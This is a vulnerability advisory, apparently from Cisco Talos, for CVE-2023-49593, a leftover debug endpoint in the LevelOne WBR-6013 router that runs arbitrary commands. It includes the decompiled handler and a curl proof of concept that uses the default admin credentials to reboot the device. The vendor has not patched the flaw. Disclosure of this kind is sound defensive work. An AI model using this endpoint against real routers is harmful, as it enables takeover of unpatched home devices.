CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
19.5%
CVE-2023-49593
Leftover debug code exists in the boa formSysCmd functionality of LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623. A specially crafted network request can lead to arbitrary command execution.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
WBR-6013 - <https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103>
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-489 - Leftover Debug Code
The WBR-6013 is a SOHO wireless router produced by LevelOne.
The WBR-6013 router has a web server called boa
. The version used in the device is a RealtekβSDK that uses boa
. One of the SDKβs API is /boafrm/formSysCmd
. This is allegedly a debugging functionality that allows execution of arbitrary commands in the linux system running on the device. Supposedly, this functionality has not been removed prior to release, as there is no documented functionality to execute commands in the linux system. Following the formSysCmd
that handles the /boafrm/formSysCmd
API:
void formSysCmd(void *wp)
{
[...]
uVar1 = get_request_param(wp,"submit-url","");
syscmd_ptr = (char *)get_request_param(wp,"sysCmd","");
if (*syscmd_ptr != '\0') {
sprintf(command_buff,100,"%s 2>&1 > %s",syscmd_ptr,"/tmp/syscmd.log");
system(command_buff);
}
[...]
}
An attacker able to reach this API would be able to execute arbitrary commands in the device.
To use a specific API of the web server, because of a CSRF protection mechanism, it is necessary to load the HTML page that would call that API:
curl --user admin:admin http://<DEVICE_IP>/syscmd.htm &>/dev/null
After this request it is possible to use the /boafrm/formSysCmd
API:
curl -d "sysCmd=reboot" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formSysCmd
After the request the device will reboot. The POC uses the default admin credentials.
LevelOne has declined to patch the issues in their software.
2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-07-08 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.
Vulnerability Reports Next Report
TALOS-2023-1872
Previous Report
TALOS-2023-1874
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
19.5%